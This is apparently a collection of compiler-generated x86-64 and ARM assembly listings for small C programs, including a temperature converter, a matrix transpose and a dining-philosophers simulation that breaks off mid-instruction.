0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "445289.c" .text .section .rodata .align 2 .LC0: .ascii "Digite a temperatura em C: \000" .align 2 .LC1: .ascii "%f\000" .global __aeabi_f2d .global __aeabi_dmul .global __aeabi_dadd .global __aeabi_d2f .align 2 .LC2: .ascii "Temperatura em C: %.2f\012Temperatura em F: %.2f\000" .align 2 .LC3: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, fp, lr} add fp, sp, #12 sub sp, sp, #24 ldr r3, .L4 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 ldr r0, .L4+4 bl printf sub r3, fp, #24 mov r1, r3 ldr r0, .L4+8 bl __isoc99_scanf ldr r3, [fp, #-24] @ float mov r0, r3 bl __aeabi_f2d ldr r2, .L4+12 ldr r3, .L4+16 bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 mov r2, #0 ldr r3, .L4+20 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl __aeabi_d2f mov r3, r0 str r3, [fp, #-20] @ float ldr r3, [fp, #-24] @ float mov r0, r3 bl __aeabi_f2d mov r4, r0 mov r5, r1 ldr r0, [fp, #-20] @ float bl __aeabi_f2d mov r2, r0 mov r3, r1 stm sp, {r2-r3} mov r2, r4 mov r3, r5 ldr r0, .L4+24 bl printf nop ldr r3, .L4 ldr r2, [r3] ldr r3, [fp, #-16] eors r2, r3, r2 mov r3, #0 beq .L3 bl __stack_chk_fail .L3: sub sp, fp, #12 @ sp needed pop {r4, r5, fp, pc} .L5: .align 2 .L4: .word .LC3 .word .LC0 .word .LC1 .word -858993459 .word 1073532108 .word 1077936128 .word .LC2 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "237022.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "asdf" .text .globl callit .type callit, @function callit: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 lea rax, .LC0[rip] mov QWORD PTR -16[rbp], rax mov QWORD PTR -8[rbp], 4 mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -8[rbp] mov rdi, rdx mov rsi, rax call take_stringref@PLT nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size callit, .-callit .globl use_vectors .type use_vectors, @function use_vectors: .LFB1: .cfi_startproc endbr64 lea r10, 8[rsp] .cfi_def_cfa 10, 0 and rsp, -64 push QWORD PTR -8[r10] push rbp mov rbp, rsp .cfi_escape 0x10,0x6,0x2,0x76,0 push r10 .cfi_escape 0xf,0x3,0x76,0x78,0x6 sub rsp, 296 mov rax, QWORD PTR fs:40 mov QWORD PTR -56[rbp], rax xor eax, eax lea rax, -240[rbp] mov rdi, rax call get_m256@PLT mov rax, QWORD PTR -240[rbp] mov rdx, QWORD PTR -232[rbp] mov QWORD PTR -208[rbp], rax mov QWORD PTR -200[rbp], rdx mov rax, QWORD PTR -224[rbp] mov rdx, QWORD PTR -216[rbp] mov QWORD PTR -192[rbp], rax mov QWORD PTR -184[rbp], rdx push QWORD PTR -184[rbp] push QWORD PTR -192[rbp] push QWORD PTR -200[rbp] push QWORD PTR -208[rbp] call take_m256@PLT add rsp, 32 lea rax, -304[rbp] mov rdi, rax call get_m512@PLT mov rax, QWORD PTR -304[rbp] mov rdx, QWORD PTR -296[rbp] mov QWORD PTR -176[rbp], rax mov QWORD PTR -168[rbp], rdx mov rax, QWORD PTR -288[rbp] mov rdx, QWORD PTR -280[rbp] mov QWORD PTR -160[rbp], rax mov QWORD PTR -152[rbp], rdx mov rax, QWORD PTR -272[rbp] mov rdx, QWORD PTR -264[rbp] mov QWORD PTR -144[rbp], rax mov QWORD PTR -136[rbp], rdx mov rax, QWORD PTR -256[rbp] mov rdx, QWORD PTR -248[rbp] mov QWORD PTR -128[rbp], rax mov QWORD PTR -120[rbp], rdx push QWORD PTR -120[rbp] push QWORD PTR -128[rbp] push QWORD PTR -136[rbp] push QWORD PTR -144[rbp] push QWORD PTR -152[rbp] push QWORD PTR -160[rbp] push QWORD PTR -168[rbp] push QWORD PTR -176[rbp] call take_m512@PLT add rsp, 64 nop mov rax, QWORD PTR -56[rbp] sub rax, QWORD PTR fs:40 je .L3 call __stack_chk_fail@PLT .L3: mov r10, QWORD PTR -8[rbp] .cfi_def_cfa 10, 0 leave lea rsp, -8[r10] .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size use_vectors, .-use_vectors .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "237022.c" .section .rodata .align 2 .LC0: .ascii "asdf\000" .text .section .rodata .align 2 .LC2: .word .LC0 .word 4 .text .align 2 .global callit .syntax unified .arm .fpu softvfp .type callit, %function callit: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 ldr r2, .L2 sub r3, fp, #12 ldm r2, {r0, r1} stm r3, {r0, r1} sub r3, fp, #12 ldm r3, {r0, r1} bl take_stringref nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L3: .align 2 .L2: .word .LC2 .size callit, .-callit .section .rodata .align 2 .LC3: .word __stack_chk_guard .text .align 2 .global use_vectors .syntax unified .arm .fpu softvfp .type use_vectors, %function use_vectors: @ args = 0, pretend = 0, frame = 200 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #248 ldr r3, .L6 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 sub r3, fp, #140 mov r0, r3 bl get_m256 sub ip, fp, #108 sub lr, fp, #140 ldmia lr!, {r0, r1, r2, r3} stmia ip!, {r0, r1, r2, r3} ldm lr, {r0, r1, r2, r3} stm ip, {r0, r1, r2, r3} mov ip, sp sub r3, fp, #92 ldm r3, {r0, r1, r2, r3} stm ip, {r0, r1, r2, r3} sub r3, fp, #108 ldm r3, {r0, r1, r2, r3} bl take_m256 sub r3, fp, #204 mov r0, r3 bl get_m512 sub ip, fp, #76 sub lr, fp, #204 ldmia lr!, {r0, r1, r2, r3} stmia ip!, {r0, r1, r2, r3} ldmia lr!, {r0, r1, r2, r3} stmia ip!, {r0, r1, r2, r3} ldmia lr!, {r0, r1, r2, r3} stmia ip!, {r0, r1, r2, r3} ldm lr, {r0, r1, r2, r3} stm ip, {r0, r1, r2, r3} mov lr, sp sub ip, fp, #60 ldmia ip!, {r0, r1, r2, r3} stmia lr!, {r0, r1, r2, r3} ldmia ip!, {r0, r1, r2, r3} stmia lr!, {r0, r1, r2, r3} ldm ip, {r0, r1, r2, r3} stm lr, {r0, r1, r2, r3} sub r3, fp, #76 ldm r3, {r0, r1, r2, r3} bl take_m512 nop ldr r3, .L6 ldr r2, [r3] ldr r3, [fp, #-8] eors r2, r3, r2 mov r3, #0 beq .L5 bl __stack_chk_fail .L5: sub sp, fp, #4 @ sp needed pop {fp, pc} .L7: .align 2 .L6: .word .LC3 .size use_vectors, .-use_vectors .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "944662.c" .intel_syntax noprefix .text .globl info_compiler .section .rodata .LC0: .string "INFO:compiler[GNU]" .section .data.rel.local,"aw" .align 8 .type info_compiler, @object .size info_compiler, 8 info_compiler: .quad .LC0 .globl info_version .section .rodata .align 32 .type info_version, @object .size info_version, 50 info_version: .string "INFO:compiler_version[00000010.00000005.00000000]" .globl info_platform .LC1: .string "INFO:platform[Linux]" .section .data.rel.local .align 8 .type info_platform, @object .size info_platform, 8 info_platform: .quad .LC1 .globl info_arch .section .rodata .LC2: .string "INFO:arch[]" .section .data.rel.local .align 8 .type info_arch, @object .size info_arch, 8 info_arch: .quad .LC2 .globl info_language_dialect_default .section .rodata .LC3: .string "INFO:dialect_default[11]" .section .data.rel.local .align 8 .type info_language_dialect_default, @object .size info_language_dialect_default, 8 info_language_dialect_default: .quad .LC3 .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -20[rbp], edi mov QWORD PTR -32[rbp], rsi mov DWORD PTR -4[rbp], 0 mov rdx, QWORD PTR info_compiler[rip] mov eax, DWORD PTR -20[rbp] cdqe add rax, rdx movzx eax, BYTE PTR [rax] movsx eax, al add DWORD PTR -4[rbp], eax mov rdx, QWORD PTR info_platform[rip] mov eax, DWORD PTR -20[rbp] cdqe add rax, rdx movzx eax, BYTE PTR [rax] movsx eax, al add DWORD PTR -4[rbp], eax mov rdx, QWORD PTR info_arch[rip] mov eax, DWORD PTR -20[rbp] cdqe add rax, rdx movzx eax, BYTE PTR [rax] movsx eax, al add DWORD PTR -4[rbp], eax mov eax, DWORD PTR -20[rbp] cdqe lea rdx, info_version[rip] movzx eax, BYTE PTR [rax+rdx] movsx eax, al add DWORD PTR -4[rbp], eax mov rdx, QWORD PTR info_language_dialect_default[rip] mov eax, DWORD PTR -20[rbp] cdqe add rax, rdx movzx eax, BYTE PTR [rax] movsx eax, al add DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "944662.c" .text .global info_compiler .section .rodata .align 2 .LC0: .ascii "INFO:compiler[GNU]\000" .data .align 2 .type info_compiler, %object .size info_compiler, 4 info_compiler: .word .LC0 .global info_version .section .rodata .align 2 .type info_version, %object .size info_version, 50 info_version: .ascii "INFO:compiler_version[00000009.00000004.00000000]\000" .global info_platform .align 2 .LC1: .ascii "INFO:platform[Linux]\000" .data .align 2 .type info_platform, %object .size info_platform, 4 info_platform: .word .LC1 .global info_arch .section .rodata .align 2 .LC2: .ascii "INFO:arch[]\000" .data .align 2 .type info_arch, %object .size info_arch, 4 info_arch: .word .LC2 .global info_language_dialect_default .section .rodata .align 2 .LC3: .ascii "INFO:dialect_default[11]\000" .data .align 2 .type info_language_dialect_default, %object .size info_language_dialect_default, 4 info_language_dialect_default: .word .LC3 .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #20 str r0, [fp, #-16] str r1, [fp, #-20] mov r3, #0 str r3, [fp, #-8] ldr r3, .L3 ldr r2, [r3] ldr r3, [fp, #-16] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-8] add r3, r3, r2 str r3, [fp, #-8] ldr r3, .L3+4 ldr r2, [r3] ldr r3, [fp, #-16] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-8] add r3, r3, r2 str r3, [fp, #-8] ldr r3, .L3+8 ldr r2, [r3] ldr r3, [fp, #-16] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-8] add r3, r3, r2 str r3, [fp, #-8] ldr r2, .L3+12 ldr r3, [fp, #-16] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-8] add r3, r3, r2 str r3, [fp, #-8] ldr r3, .L3+16 ldr r2, [r3] ldr r3, [fp, #-16] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-8] add r3, r3, r2 str r3, [fp, #-8] ldr r3, [fp, #-8] mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L4: .align 2 .L3: .word info_compiler .word info_platform .word info_arch .word info_version .word info_language_dialect_default .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "66381.c" .intel_syntax noprefix .text .section .rodata .align 8 .LC0: .string "Enter the row & column of a matrix:-" .LC1: .string "%d %d" .align 8 .LC2: .string "Enter the elements of matrix:-" .LC3: .string "%d" .LC4: .string "The given matrix is:-" .LC5: .string "%d\t" .align 8 .LC6: .string "The transpose of the matrix is:-" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push r15 push r14 push r13 push r12 push rbx sub rsp, 120 .cfi_offset 15, -24 .cfi_offset 14, -32 .cfi_offset 13, -40 .cfi_offset 12, -48 .cfi_offset 3, -56 mov rax, QWORD PTR fs:40 mov QWORD PTR -56[rbp], rax xor eax, eax mov rax, rsp mov QWORD PTR -152[rbp], rax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT lea rdx, -92[rbp] lea rax, -96[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT mov ecx, DWORD PTR -92[rbp] mov esi, DWORD PTR -96[rbp] movsx rax, ecx sub rax, 1 mov QWORD PTR -80[rbp], rax movsx rax, ecx mov QWORD PTR -144[rbp], rax mov QWORD PTR -136[rbp], 0 movsx rax, ecx lea rbx, 0[0+rax*4] movsx rax, esi sub rax, 1 mov QWORD PTR -72[rbp], rax movsx rax, ecx mov QWORD PTR -112[rbp], rax mov QWORD PTR -104[rbp], 0 movsx rax, esi mov QWORD PTR -128[rbp], rax mov QWORD PTR -120[rbp], 0 mov r8, QWORD PTR -112[rbp] mov r9, QWORD PTR -104[rbp] mov rdx, r9 mov r10, QWORD PTR -128[rbp] mov r11, QWORD PTR -120[rbp] imul rdx, r10 mov rax, r11 imul rax, r8 lea rdi, [rdx+rax] mov rax, r8 mul r10 add rdi, rdx mov rdx, rdi movsx rax, ecx mov r14, rax mov r15d, 0 movsx rax, esi mov r12, rax mov r13d, 0 mov rdx, r15 imul rdx, r12 mov rax, r13 imul rax, r14 lea rdi, [rdx+rax] mov rax, r14 mul r12 add rdi, rdx mov rdx, rdi movsx rdx, ecx movsx rax, esi imul rax, rdx lea rdx, 0[0+rax*4] mov eax, 16 sub rax, 1 add rax, rdx mov esi, 16 mov edx, 0 div rsi imul rax, rax, 16 mov rcx, rax and rcx, -4096 mov rdx, rsp sub rdx, rcx .L2: cmp rsp, rdx je .L3 sub rsp, 4096 or QWORD PTR 4088[rsp], 0 jmp .L2 .L3: mov rdx, rax and edx, 4095 sub rsp, rdx mov rdx, rax and edx, 4095 test rdx, rdx je .L4 and eax, 4095 sub rax, 8 add rax, rsp or QWORD PTR [rax], 0 .L4: mov rax, rsp add rax, 3 shr rax, 2 sal rax, 2 mov QWORD PTR -64[rbp], rax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT mov DWORD PTR -84[rbp], 0 jmp .L5 .L8: mov DWORD PTR -88[rbp], 0 jmp .L6 .L7: mov rdx, rbx shr rdx, 2 mov eax, DWORD PTR -88[rbp] movsx rcx, eax mov eax, DWORD PTR -84[rbp] cdqe imul rax, rdx add rax, rcx lea rdx, 0[0+rax*4] mov rax, QWORD PTR -64[rbp] add rax, rdx mov rsi, rax lea rdi, .LC3[rip] mov eax, 0 call __isoc99_scanf@PLT add DWORD PTR -88[rbp], 1 .L6: mov eax, DWORD PTR -92[rbp] cmp DWORD PTR -88[rbp], eax jl .L7 add DWORD PTR -84[rbp], 1 .L5: mov eax, DWORD PTR -96[rbp] cmp DWORD PTR -84[rbp], eax jl .L8 lea rdi, .LC4[rip] call puts@PLT mov DWORD PTR -84[rbp], 0 jmp .L9 .L12: mov DWORD PTR -88[rbp], 0 jmp .L10 .L11: mov rcx, rbx shr rcx, 2 mov rax, QWORD PTR -64[rbp] mov edx, DWORD PTR -88[rbp] movsx rsi, edx mov edx, DWORD PTR -84[rbp] movsx rdx, edx imul rdx, rcx add rdx, rsi mov eax, DWORD PTR [rax+rdx*4] mov esi, eax lea rdi, .LC5[rip] mov eax, 0 call printf@PLT add DWORD PTR -88[rbp], 1 .L10: mov eax, DWORD PTR -92[rbp] cmp DWORD PTR -88[rbp], eax jl .L11 mov edi, 10 call putchar@PLT add DWORD PTR -84[rbp], 1 .L9: mov eax, DWORD PTR -96[rbp] cmp DWORD PTR -84[rbp], eax jl .L12 lea rdi, .LC6[rip] call puts@PLT mov DWORD PTR -84[rbp], 0 jmp .L13 .L16: mov DWORD PTR -88[rbp], 0 jmp .L14 .L15: mov rcx, rbx shr rcx, 2 mov rax, QWORD PTR -64[rbp] mov edx, DWORD PTR -84[rbp] movsx rsi, edx mov edx, DWORD PTR -88[rbp] movsx rdx, edx imul rdx, rcx add rdx, rsi mov eax, DWORD PTR [rax+rdx*4] mov esi, eax lea rdi, .LC5[rip] mov eax, 0 call printf@PLT add DWORD PTR -88[rbp], 1 .L14: mov eax, DWORD PTR -92[rbp] cmp DWORD PTR -88[rbp], eax jl .L15 mov edi, 10 call putchar@PLT add DWORD PTR -84[rbp], 1 .L13: mov eax, DWORD PTR -96[rbp] cmp DWORD PTR -84[rbp], eax jl .L16 mov rsp, QWORD PTR -152[rbp] mov eax, 0 mov rbx, QWORD PTR -56[rbp] sub rbx, QWORD PTR fs:40 je .L18 call __stack_chk_fail@PLT .L18: lea rsp, -40[rbp] pop rbx pop r12 pop r13 pop r14 pop r15 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "66381.c" .text .section .rodata .align 2 .LC0: .ascii "Enter the row & column of a matrix:-\000" .align 2 .LC1: .ascii "%d %d\000" .align 2 .LC2: .ascii "Enter the elements of matrix:-\000" .align 2 .LC3: .ascii "%d\000" .align 2 .LC4: .ascii "The given matrix is:-\000" .align 2 .LC5: .ascii "%d\011\000" .align 2 .LC6: .ascii "The transpose of the matrix is:-\000" .align 2 .LC7: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, fp, lr} add fp, sp, #24 sub sp, sp, #36 ldr r3, .L16 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 mov r3, sp mov r8, r3 ldr r0, .L16+4 bl printf sub r2, fp, #56 sub r3, fp, #60 mov r1, r3 ldr r0, .L16+8 bl __isoc99_scanf ldr ip, [fp, #-56] ldr lr, [fp, #-60] sub r3, ip, #1 str r3, [fp, #-44] mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip lsl r6, r3, #2 sub r3, lr, #1 str r3, [fp, #-40] mov r3, ip mov r4, r3 mov r5, #0 mov r3, lr mov r0, r3 mov r1, #0 mul r2, r0, r5 mul r3, r4, r1 add r7, r2, r3 umull r2, r3, r4, r0 add r1, r7, r3 mov r3, r1 mov r0, #0 mov r1, #0 lsl r1, r3, #5 orr r1, r1, r2, lsr #27 lsl r0, r2, #5 mov r3, ip mov r4, r3 mov r5, #0 mov r3, lr mov r0, r3 mov r1, #0 mul r2, r0, r5 mul r3, r4, r1 add r7, r2, r3 umull r2, r3, r4, r0 add r1, r7, r3 mov r3, r1 mov r0, #0 mov r1, #0 lsl r1, r3, #5 orr r1, r1, r2, lsr #27 lsl r0, r2, #5 mov r3, ip mov r2, lr mul r3, r2, r3 lsl r3, r3, #2 add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 sub sp, sp, r3 mov r3, sp add r3, r3, #3 lsr r3, r3, #2 lsl r3, r3, #2 str r3, [fp, #-36] ldr r0, .L16+12 bl printf mov r3, #0 str r3, [fp, #-48] b .L2 .L5: mov r3, #0 str r3, [fp, #-52] b .L3 .L4: lsr r3, r6, #2 ldr r2, [fp, #-48] mul r2, r3, r2 ldr r3, [fp, #-52] add r3, r2, r3 lsl r3, r3, #2 ldr r2, [fp, #-36] add r3, r2, r3 mov r1, r3 ldr r0, .L16+16 bl __isoc99_scanf ldr r3, [fp, #-52] add r3, r3, #1 str r3, [fp, #-52] .L3: ldr r3, [fp, #-56] ldr r2, [fp, #-52] cmp r2, r3 blt .L4 ldr r3, [fp, #-48] add r3, r3, #1 str r3, [fp, #-48] .L2: ldr r3, [fp, #-60] ldr r2, [fp, #-48] cmp r2, r3 blt .L5 ldr r0, .L16+20 bl puts mov r3, #0 str r3, [fp, #-48] b .L6 .L9: mov r3, #0 str r3, [fp, #-52] b .L7 .L8: lsr r2, r6, #2 ldr r3, [fp, #-36] ldr r1, [fp, #-48] mul r1, r2, r1 ldr r2, [fp, #-52] add r2, r1, r2 ldr r3, [r3, r2, lsl #2] mov r1, r3 ldr r0, .L16+24 bl printf ldr r3, [fp, #-52] add r3, r3, #1 str r3, [fp, #-52] .L7: ldr r3, [fp, #-56] ldr r2, [fp, #-52] cmp r2, r3 blt .L8 mov r0, #10 bl putchar ldr r3, [fp, #-48] add r3, r3, #1 str r3, [fp, #-48] .L6: ldr r3, [fp, #-60] ldr r2, [fp, #-48] cmp r2, r3 blt .L9 ldr r0, .L16+28 bl puts mov r3, #0 str r3, [fp, #-48] b .L10 .L13: mov r3, #0 str r3, [fp, #-52] b .L11 .L12: lsr r2, r6, #2 ldr r3, [fp, #-36] ldr r1, [fp, #-52] mul r1, r2, r1 ldr r2, [fp, #-48] add r2, r1, r2 ldr r3, [r3, r2, lsl #2] mov r1, r3 ldr r0, .L16+24 bl printf ldr r3, [fp, #-52] add r3, r3, #1 str r3, [fp, #-52] .L11: ldr r3, [fp, #-56] ldr r2, [fp, #-52] cmp r2, r3 blt .L12 mov r0, #10 bl putchar ldr r3, [fp, #-48] add r3, r3, #1 str r3, [fp, #-48] .L10: ldr r3, [fp, #-60] ldr r2, [fp, #-48] cmp r2, r3 blt .L13 mov sp, r8 mov r3, #0 ldr r2, .L16 ldr r1, [r2] ldr r2, [fp, #-32] eors r1, r2, r1 mov r2, #0 beq .L15 bl __stack_chk_fail .L15: mov r0, r3 sub sp, fp, #24 @ sp needed pop {r4, r5, r6, r7, r8, fp, pc} .L17: .align 2 .L16: .word .LC7 .word .LC0 .word .LC1 .word .LC2 .word .LC3 .word .LC4 .word .LC5 .word .LC6 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "171213.c" .intel_syntax noprefix .text .globl philosophers .bss .align 4 .type philosophers, @object .size philosophers, 4 philosophers: .zero 4 .text .globl next .type next, @function next: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -20[rbp], edi mov eax, DWORD PTR -20[rbp] add eax, 1 mov ecx, DWORD PTR philosophers[rip] cdq idiv ecx mov DWORD PTR -4[rbp], edx cmp DWORD PTR -4[rbp], 0 jne .L2 mov eax, DWORD PTR philosophers[rip] mov DWORD PTR -4[rbp], eax .L2: mov eax, DWORD PTR -4[rbp] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size next, .-next .globl previous .type previous, @function previous: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -20[rbp], edi mov eax, DWORD PTR -20[rbp] sub eax, 1 mov ecx, DWORD PTR philosophers[rip] cdq idiv ecx mov DWORD PTR -4[rbp], edx cmp DWORD PTR -4[rbp], 0 jne .L5 mov eax, DWORD PTR philosophers[rip] mov DWORD PTR -4[rbp], eax .L5: mov eax, DWORD PTR -4[rbp] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size previous, .-previous .section .rodata .align 8 .LC0: .string "Philosopher %d was HUNGRY on average for %f seconds. \n" .text .globl ready_time_average .type ready_time_average, @function ready_time_average: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov DWORD PTR -4[rbp], edi mov DWORD PTR -8[rbp], esi movsd QWORD PTR -16[rbp], xmm0 pxor xmm1, xmm1 cvtsi2sd xmm1, DWORD PTR -8[rbp] movsd xmm0, QWORD PTR -16[rbp] divsd xmm0, xmm1 movq rdx, xmm0 mov eax, DWORD PTR -4[rbp] movq xmm0, rdx mov esi, eax lea rdi, .LC0[rip] mov eax, 1 call printf@PLT pxor xmm1, xmm1 cvtsi2sd xmm1, DWORD PTR -8[rbp] movsd xmm0, QWORD PTR -16[rbp] divsd xmm0, xmm1 movq rax, xmm0 movq xmm0, rax leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size ready_time_average, .-ready_time_average .globl Current_Time .type Current_Time, @function Current_Time: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov edi, 0 call time@PLT mov QWORD PTR -16[rbp], rax lea rax, -16[rbp] mov rdi, rax call ctime@PLT mov rdx, QWORD PTR -8[rbp] sub rdx, QWORD PTR fs:40 je .L11 call __stack_chk_fail@PLT .L11: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size Current_Time, .-Current_Time .section .rodata .align 8 .LC1: .string "Philosopher %d is THINKING at %s \n" .align 8 .LC2: .string "Philosopher %d is HUNGRY at %s \n" .align 8 .LC3: .string "Philosopher %d failed to take fork %d , because philosopher %d was eating at %s \n" .align 8 .LC4: .string "Philosopher %d failed to take fork %d , because philosopher %d was eating at %s \n" .align 8 .LC5: .string "Philosopher %d is EATING at %s \n" .align 8 .LC6: .string "Philosopher %d is FULL and LEAVES the table at %s \n" .text .globl Philosopher_Meal .type Philosopher_Meal, @function Philosopher_Meal: .LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push r12 push rbx sub rsp, 80 .cfi_offset 12, -24 .cfi_offset 3, -32 mov QWORD PTR -88[rbp], rdi mov rax, QWORD PTR -88[rbp] mov QWORD PTR -56[rbp], rax mov DWORD PTR -68[rbp], 0 jmp .L13 .L16: mov eax, 0 call Current_Time mov rdx, rax mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] mov esi, eax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT call rand@PLT mov edx, eax movsx rax, edx imul rax, rax, 1717986919 shr rax, 32 sar eax, 2 mov esi, edx sar esi, 31 sub eax, esi mov ecx, eax mov eax, ecx sal eax, 2 add eax, ecx add eax, eax mov ecx, edx sub ecx, eax lea eax, 1[rcx] mov edi, eax call sleep@PLT mov rax, QWORD PTR -56[rbp] mov rax, QWORD PTR 16[rax] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -56[rbp] mov rax, QWORD PTR 24[rax] mov QWORD PTR -40[rbp], rax mov eax, 0 call Current_Time mov rdx, rax mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] mov esi, eax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT mov edi, 0 call time@PLT mov QWORD PTR -32[rbp], rax mov rax, QWORD PTR -48[rbp] mov rdi, rax call pthread_mutex_trylock@PLT mov DWORD PTR -64[rbp], eax cmp DWORD PTR -64[rbp], 0 je .L14 mov eax, 0 call Current_Time mov rbx, rax mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] mov edi, eax call previous mov 